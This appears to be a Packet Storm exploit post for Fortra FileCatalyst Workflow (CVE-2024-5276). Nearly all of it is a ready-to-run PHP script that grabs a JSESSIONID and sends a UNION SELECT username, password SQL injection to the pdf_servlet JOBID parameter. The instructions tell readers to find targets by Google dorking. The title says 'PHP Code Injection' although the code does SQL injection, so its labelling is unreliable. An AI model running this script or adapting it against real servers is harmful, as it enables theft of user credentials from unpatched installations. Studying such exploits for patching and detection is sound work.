Share
## https://sploitus.com/exploit?id=PACKETSTORM:189796
=============================================================================================================================================
| # Title : Fortra FileCatalyst Workflow v5.1.6 Build 135 PHP Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://www.fortra.com/fr/lignes-de-produit/filecatalyst |
=============================================================================================================================================
POC :
[+] Dorking İn Google Or Other Search Enggine.
[+] Code Description: The code extracts the JSESSIONID first and then uses it to perform SQL Injection.
( https://packetstorm.news/files/id/180866/ CVE-2024-5276)
[+] save code as poc.php.
[+] Set Target : line 48 + 120
[+] USage : php poc.php
[+] PayLoad :
<?php
class SessionExtractor {
private $target;
private $userAgent;
private $jsessionid;
public function __construct($target) {
$this->target = rtrim($target, '/');
$this->userAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36";
}
private function sendRequest($url) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_USERAGENT, $this->userAgent);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$response = curl_exec($ch);
if (curl_errno($ch)) {
die("cURL Error: " . curl_error($ch));
}
curl_close($ch);
return $response;
}
public function getSessionId() {
echo "[*] Attempt to extract JSESSIONID...\n";
$response = $this->sendRequest("{$this->target}/workflow/");
if (preg_match('/Set-Cookie:\s*JSESSIONID=([^;]+)/i', $response, $matches)) {
$this->jsessionid = trim($matches[1]);
file_put_contents("session.txt", $this->jsessionid);
echo "[+] Extracted JSESSIONID: {$this->jsessionid}\n";
return $this->jsessionid;
} else {
die("[-] JSESSIONID not found. Check the link.\n");
}
}
}
$extractor = new SessionExtractor('https://ADD_TARGET_HERE/');
$jsessionid = $extractor->getSessionId();
class Indoushka {
private $target;
private $userAgent;
private $jsessionid = null;
public function __construct($target) {
$this->target = rtrim($target, '/');
$this->userAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36";
}
private function sendRequest($url, $headers = []) {
$ch = curl_init();
curl_setopt_array($ch, [
CURLOPT_URL => $url,
CURLOPT_RETURNTRANSFER => true,
CURLOPT_HEADER => true,
CURLOPT_FOLLOWLOCATION => true, // تتبع التحويلات
CURLOPT_SSL_VERIFYHOST => false,
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_USERAGENT => $this->userAgent,
CURLOPT_HTTPHEADER => $headers
]);
$response = curl_exec($ch);
if (curl_errno($ch)) {
die("CURL Error: " . curl_error($ch));
}
curl_close($ch);
return $response;
}
public function getSessionId() {
if ($this->jsessionid) {
echo "[*] JSESSIONID already extracted: {$this->jsessionid}\n";
return;
}
echo "[*] Attempting to extract JSESSIONID...\n";
$response = $this->sendRequest("{$this->target}/workflow/");
if (preg_match('/Set-Cookie:\s*JSESSIONID=([^;]+)/i', $response, $matches)) {
$this->jsessionid = trim($matches[1]);
echo "[+] JSESSIONID extracted: {$this->jsessionid}\n";
} else {
die("[-] JSESSIONID not found. Check the link.\n");
}
}
public function injectSQL($payload) {
if (!$this->jsessionid) {
die("[-] No session ID found. Run getSessionId() first.\n");
}
echo "[*] Sending SQL Injection payload...\n";
$url = "{$this->target}/workflow/pdf_servlet?JOBID=" . urlencode($payload);
$headers = ["Cookie: JSESSIONID={$this->jsessionid}"];
$response = $this->sendRequest($url, $headers);
if (strpos($response, "Success") !== false || strpos($response, "Admin") !== false) {
echo "[+] SQL Injection executed successfully!\n";
} else {
echo "[-] SQL Injection failed. Check input validity.\n";
}
}
}
// تشغيل الكود
$injector = new Indoushka('https://ADD_TARGET_HERE/');
$injector->getSessionId();
// حمولة مخصصة
$payload = "' UNION SELECT username, password FROM users --";
$injector->injectSQL($payload);
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================